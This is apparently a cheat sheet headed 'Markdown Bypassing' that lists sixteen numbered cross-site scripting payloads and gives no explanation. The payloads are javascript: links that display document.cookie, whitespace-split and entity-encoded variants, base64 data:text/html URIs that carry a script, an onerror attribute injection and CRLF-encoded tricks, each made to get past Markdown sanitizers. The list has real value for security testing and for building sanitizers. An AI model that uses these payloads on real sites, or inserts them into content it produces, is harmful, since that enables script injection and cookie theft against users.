=================================================================================================


╔╦╗┌─┐┬─┐┬┌─┌┬┐┌─┐┬ ┬┌┐┌  ╔╗ ┬ ┬┌─┐┌─┐┌─┐┌─┐┬┌┐┌┌─┐  
║║║├─┤├┬┘├┴┐ │││ │││││││  ╠╩╗└┬┘├─┘├─┤└─┐└─┐│││││ ┬  
╩ ╩┴ ┴┴└─┴ ┴─┴┘└─┘└┴┘┘└┘  ╚═╝ ┴ ┴  ┴ ┴└─┘└─┘┴┘└┘└─┘  


=================================================================================================

1 - [a](javascript:prompt(document.cookie))

2 - [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))

3 - ![a](javascript:prompt(document.cookie))\

4 - <javascript:prompt(document.cookie)>  

5 - <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  

6 - ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\

7 - [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

8 - [a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)

9 - ![a'"`onerror=prompt(document.cookie)](x)\

10 - [citelol]: (javascript:prompt(document.cookie))

11 - [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)

12 - [test](javascript://%0d%0aprompt(1))

13 - [test](javascript://%0d%0aprompt(1);com)

14 - <a href="javascript://%0d%0aprompt(1);com>test</a>  

15 - [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)

16 - [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

